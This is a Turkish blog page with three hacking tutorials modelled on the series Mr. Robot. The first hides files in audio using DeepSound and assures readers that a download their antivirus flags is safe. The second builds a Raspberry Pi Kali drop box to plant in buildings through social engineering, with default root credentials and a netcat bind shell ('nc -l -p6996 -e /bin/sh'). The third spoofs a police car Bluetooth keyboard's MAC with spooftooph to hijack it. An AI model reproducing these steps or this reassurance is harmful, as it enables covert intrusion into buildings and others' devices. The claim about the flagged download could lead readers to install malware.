Veri Dosyalarını Müzik olarak şifrelemek.

Published on: 16:07 0

Dikkat : Kaynak Belirtmeden Herhangi Biryerde Paylaşmayın ! 
Merhaba Arkadaşlar,
Bu yazımda sizlere Veri Dosyalarını nasıl Müzik görünümü vererek şifreliceğimizi anlatacağım.
Mr. Robot izleyenler bilir. Elliot Hacklediği kişilerin bilgilerini CD'ye şifreleyerek depolar. bunu anlatacağım.

Sam Esmail aslında çok mantıklı düşünmüş.Bu CD'lere sadece siz ulaşabilirsiniz.Sizin dışınızda birisi bu CD'yi çalıştırırsa sadece içerisinde bulunan ses dosyasını dinleyebilecekler.Dizi'de Elliotu'un DeepSound yazılımını kullandığı görülüyor.Fakat DeepSound sadece Windows için yazılmıştır.Kali Linux için böyle bir sürümü bulunmamaktadır.Aslında arka planda daha farklı yazılımlar vardır. Sam Esmail bilindik birşey olması için DeepSound yazılımı görünümü vermiş.

Başlayalım.

İlk olarak DeepSound yazılımını indirelim ve kuralım.Buradan İndirebilirsiniz. Bilgisayarınız virüs olarak algılayabilir. Fakat hack tools olduğu için içerisinde virüs olmadığına garanti verebilirim.

Kurulum bittikten sonra aşağıdaki gibi bir pencere ile karşılaşacaksınız. Sol tarafta sizin klasörleriniz görüntülenmekte. Üst tarafta ise araçlar.

Üst pencereden Settings(ayarlar) buttonuna tıklayalım.
Çıkan pencereden ayarlarımızı yapalım.
Language = Dil Ayarı.
Output Directory = Şifrelenmiş veriyi oluşturduğunuzda kaydedileceği yer. (CD mizin olduğu yeri seçebiliriz.)
Output Format = Müzik dosyanızın türü wav veya flac dosya türünü seçebilirsiniz.
Encrypt kısmında ise
Encrypt Files kısmı çok önemlidir. En güçlü şifreleme türlerinden biri olan AES 256 bit ile şifreleme yapar.
Password'u aklınızda kalacak birşey yapmaya özen gösterin. Tekrar CD içindeki veriyi okumak istediğinizde lazım olacaktır.

OK dedikten sonra artık bir müzik dosyası seçebiliriz. Sol taraftaki pencereden müziğimizin olduğu klasörü bulup müziğimize çift tıklıyoruz.

Verilerimizi müzik dosyasının içine atmaya hazırız.Üst pencereden Add new diyoruz.Şifreliceğimiz gerekli belgeleri seçiyoruz.

Şimdi dosyalarımızı şifreliyelim. Yukarıdaki Encode iconuna tıklayınca dosyalarımız şifrelenmiş olacaktır.Artık kimse bilgilerinize ulaşamaz. Ses dosyasına ulaşsalar bile sadece içerisindeki müziği dinleyebilirler. :) 

Şifrelediğimiz Dosyayı Açmak

Yazılımda sol taraftaki pencereden ses dosyasının olduğu yeri buluyoruz.Ardından üstüne tıklıyoruz. Bizden şifre isticektir.İstediğini verelim.

Şifreyi doğru girerseniz sağ tarafta içerisindeki dosyalar görüntülenecektir.Çift tıklayarak dosyaları okuyabilir , görebilirsiniz.

Gördüğünüz gibi. :) 

Yakında Kali Linux dersleri paylaşacağım kanalım : https://www.youtube.com/channel/UCBUFb-lkZ0zHXzA-nvBvO0Q?sub_confirmation=1 

İletişim : Mentalistler@mit.tc

Read More

Bina Hacklenebilirmi ?

Published on: 20:20 1

Dikkat : Kaynak Belirtmeden Herhangi Biryerde Paylaşmayın ! 

Merhaba arkadaşlar,
Mr robot dizisini bilen bilir. Bir bölümünde Evil corp binalarına girip sosyal mühendislik ile Raspberry pi takıp bina termostatlarını hackliyorlardı.Bunun nasıl yapıldığını sizlere anlatmak istiyorum.


Arkadaşlar ilk olarak Kali Linux'un arm versiyonunu indirmemiz gerekiyor.
Kali Linux'un arm versiyonun'un ne önemi var ?
Raspberry Pi ve birçok mobil cihazlarda daha fazla enerji verimliliği soğutucu gibi işlemleri üstlenebiliyor.

Raspberry pi dosyasını indirebilmek için Offensive Security'in indirme sayfasına gidin.  indirme işlemi bittikten sonra içerisindeki dosyayı winrar veya unzip tarzı araçlarla arşivden çıkartın.

Buradan sonra bize bir adet sd kart lazım.En az 4 gb sd kart öneririm. ardından Win32 disk imager adlı yazılımı indiriyoruz.

İndirme işlemi bittikten sonra Win32 disk imager adlı yazılıma sağ tıklayıp yönetici olarak çalıştırıyoruz.

İmage File yazan yere tıklayıp Kali Linux Arm'ı seçiyoruz.
Device kısmına tıklayıp sd kartımızın adını seçiyoruz.
Son olarak Write buttonuna tıklıyoruz.

Yazmaya başlıyor otomatik olarak.

SD kartı Raspberry Pi üzerine kuralım.

SD kartımızı bilgisayardan çıkartıp Raspberry Pi üzerine takıyoruz. 

Yukarıda birşeyler dolmaya başlicaktır.Ardından sizden kullanıcı adı ve password isticektir.

Username :root

Password :toor

Ardından şu komutu girin :

startx

Artık hazırsınız. Her yere yerleştirebileceğiniz mini Kali hack aracınız var.

Raspberry Pi'yi düşünebileceğiniz her yere yerleştirebilir, üstüne kablosuz internet adaptörü gibi herşeyi ekleyebilirsiniz. 

Şimdi bağlanmaya geçelim.İlk önce Netcat dinlemesi yapalım (Netcat Kali Linux çekirdeğinde kendiliğinden vardır.) 

Komutumuz : nc -l -p6996 -e /bin/sh

Artık 6996 portu ile Raspberry Pi terminaline bağlanabilir, Raspberry Pi'yi bilgisayardan çıkartıp herhangi biryere takabilirsiniz artık. 

Şimdi bağlantı kurabiliyormuyuz diye deniyelim.

Komutumuz : nc 192.168.1.105 6996

Ardından istediğiniz her komutu internet ağınızda ki Raspberry Pi'ye yazarak  istediğinizi yapabilirsiniz.

Tabiki internet ağınızda olması gerekmiyor. SSH bağlantısı'da kurabilirsiniz. ben yazı uzumasın diye anlayabileceğiniz şekilde anlatmaya çalıştım. :) 

İletişim : mentalistler@mit.tc

Yakında Kali Linux derslerini vermeye başlicağım kanal : 

https://www.youtube.com/channel/UCBUFb-lkZ0zHXzA-nvBvO0Q

Read More

Bluetooth Klavye nasıl hacklenir ?

Published on: 14:48 0

Dikkat : Kaynak Belirtmeden Herhangi Biryerde Paylaşmayın ! 

Merhaba Arkadaşlar,
Bu yazımda sizlere MR Robot dizisinde 6. bölümde Elliot'un polisi nasıl hacklediğini anlatacağım.
Yazıda kendimizi Elliot yerime koyarak anlatıyorum.


Gerekli olanlar :
Kali Linux (Sanal Bilgisayara kurmayın! sürücü sorunundan dolayı başaramazsınız.)
Bluetooth


Nasıl Yapılır ? 


Kali linuxtan bluetoothmuzu çalıştıralım.

Komutumuz : kali > service bluetooth start

Ardından bluetooth aygıtımızı seçelim.

Komutumuz : kali > hciconfig hci0 up

Gerçekten çalışıyormu diye kontrol edelim.

Komutumu : kali > hciconfig hci0

2. Satırda "BD Adress"'i not edin. Bu Bluetooth cihazın MAC adresidir.

Şimdi etrafımızdaki bluetooth aygıtlarını tarayalım.(Bluetooth klavyeyi bulmamız lazım.)

komutumuz : kali > btscanner

Eğer herşeyi doğru yaptıysanız aşağıdaki gibi bir sonuç alırsınız :

Burada gördüğünüz gibi etrafınızdaki bütün bluetooth aygıtlarınızın listesi çıktı. Dizi'de izlediğinizde polis Elliotun 10 metre kadar uzağındaydı.Bu kadar uzaktan nasıl veri alabilirim derseniz.  10 -20 metre bluetooth antenleri var bunlardan satın alabilirsiniz. Şimdi yukarıda ki resimde görüldüğü gibi bilgiler geldikten sonra mac adress ve Name  kısmını bir yere not alıyoruz.

Şimdi klavye mac adresini spooflicağız.

Bunu yapmak için Kali Linux'un bir toolu olan SpoofTooph'u kullanacağız.

Komutumuz : kali > spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537

Komutumuzdaki -i -a -n komutları ne işe yaramaktadır ? 

• -i Cihazımızı atıyoruz hci0
• -a Hedefin MAC adresini yazıyoruz.
• -n Hedef'e isim atıyoruz.Polis arabası olduğu için "Car537" yaptım ben.Siz istediğiniz gibi yapabilirsiniz.

Eğer herşeyi Başarılı yaptıysak böyle bir ekranla karşılaşacağız :

Şimdi ne yapmış olduk ? kendi mac adresimizi hedef mac adresinin aynısını yaptık.

Buraya kadar başarılı gelebilirsek hedefin mac adresini taklit ediyor hale gelmişiz demektir.

Yani mac adresimiz polis arabası(hedef) ile aynı olması gerekmektedir.

Hciconfig komutu ile sorgulayalım.

Komutumuz :kali > hciconfig hci0 name

Artık polis arabasının klavyesinin  üzerinde muhteşem bir klonumuz var. :)

Şimdi nasıl polisin bilgisayarına birşeyler yazacağım ?

arkadaşlar şimdi dizide izlediğinizde direk bağlanıyordu.Fakat bu imkansız gibi birşey.Bağlana bilmek için Bluetooth klavyenin şifresi gerekmektedir.Brute force ile birşeyler başarabilirsiniz. Fakat daha kolayı var.Sistemi yeniden başlatmasını sağlayın. Bu durumda siz karşı tarafın klonu olduğunuz için tekrar bağlantı kurulduğunda sizinlede bağlantı kurulmuş olacaktır.

Dizide izlediğiniz gibi birde hapishane kapılarını uzaktan açıyorlar.Bunu SCADA (endüstriyel sistemler) sistemi ile FTP bağlantısı oluşturarak yapıyorlar. Fakat dizide bütün kapılara aynı anda açtıkları için elektrikler kısa devre yapıp çöküyor.

Türkiyedeki Hapishanelerde SCADA sistemi yoktur. :D boşuna heykır havalarına girmeyin.

iletişim için : mentalistler@mit.tc mail atmanız yeterlidir.

Read More